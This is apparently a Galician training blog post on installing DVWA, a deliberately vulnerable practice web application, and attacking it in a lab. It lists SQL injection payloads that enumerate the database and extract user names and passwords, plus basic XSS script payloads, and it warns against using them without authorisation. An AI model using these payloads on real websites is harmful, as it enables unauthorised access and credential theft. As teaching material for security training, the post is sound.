Comentado por : CeMIT Cuntis
mércores, 17 de outubro de 2018
DVWA
é unha aplicación web PHP e MySQL para o entrenamento de explotación de vulnerabilidades web nun entorno controlado e de maneira legal
DVWA DVWA online default login: admin - password
Se queremos modificar o directorio de destino teremos que modificar dentro do arquivo httpd.conf ( c:\wamp\bin\apache\Apachexx\conf )
os parámetros:
DocumentRoot e Directory Cómo configurar sitios web en WampServer
Temos que ir ao directorio c:\wamp\www\DVWA\config e renomear o arquivo como config.inc.php e renomear a entrada db_password como ='';
e finalmente pulsar o botón "crear a base de datos"
Para poder executar DVWA correctamente debemos realizar as seguintes accións:
1.- Arrancar o servidor Apache: service apache2 start
2.- Arrancar o motor da base de datos: service mysql start
3.- Acceder á ruta da aplicación web vulnerable: localhost/dvwa ou 127.0.0.1/dvwa/
DVWA Security: low
(Só utilizar en DVWA para fins académicos e aprendizaxe.
NUNCA utilizar en ningunha páxina web sen autorización xa que poderá supoñer problemas legais)
Exemplos
SQL Injection: ' or 1=1# 1' UNION SELECT 1,2#
1' UNION SELECT 1,(select database());#
1' UNION SELECT 1,group_concat(schema_name) FROM information_schema.schemata;#
se ao teclear www.paxinaproba.com/index.php?id=2' a web será vulnerable se mostra un erro similar a este: You have an error in your SQL syntax;
se probamos a poñer un número calquera amósanos o ID, o nome e o apelido, polo tanto poderíamos saber cantos usuarios ten a base de datos.
(Neste caso sabemos que a base de datos ten 5 usuarios porque se poñemos 6 ou un número maior non devolve nada)
Sabemos que ten 2 columnas porque ao poñer a seguinte da erro: 1' and 1=0 order by 3 #
Confirmámolo, inxectando algo nas 2 columnas: 1' and 1=0 union select 1,2 #
Tamén podemos inxectar unha cadea de caracteres:
1' and 1=0 union select 'Boas','Estamos de PROBAS' #
versión da base de datos: 1' and 1=0 union select null,Version() #
tamén funciona: ' union select null, @@version #
nome da base de datos: 1' and 1=0 union select null,database() #
' union select null, database() #
Hostname: ' union select null, @@hostname #
Usuario: ' union all select current_user(), user() #
' union all select system_user(), user() #
nomes das tablas: (sabemos así que existe unha tabla "users")
1' and 1=0 union select null,table_name from information_schema.tables where table_schema!='msql' and table_schema!='information_schema'#
1' and 1=1 union select null, table_name from information_schema.tables #
nomes dos usuarios:
1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'#
' union select null, column_name from information_schema.columns where table_name = 'users' #
usuarios e contrasinais: 1' and 1=0 union select null,concat(user,0x0a,password) from users #
1' and 1=1 union select user, password from users #
XSS Reflected: (para practicar XSS nunha aplicación web)
<script>alert('de proba')</script>
XSS Stored: (formulario web)
en Mensaxe teclear: <script>alert('CeMIT, Cuntis')</script>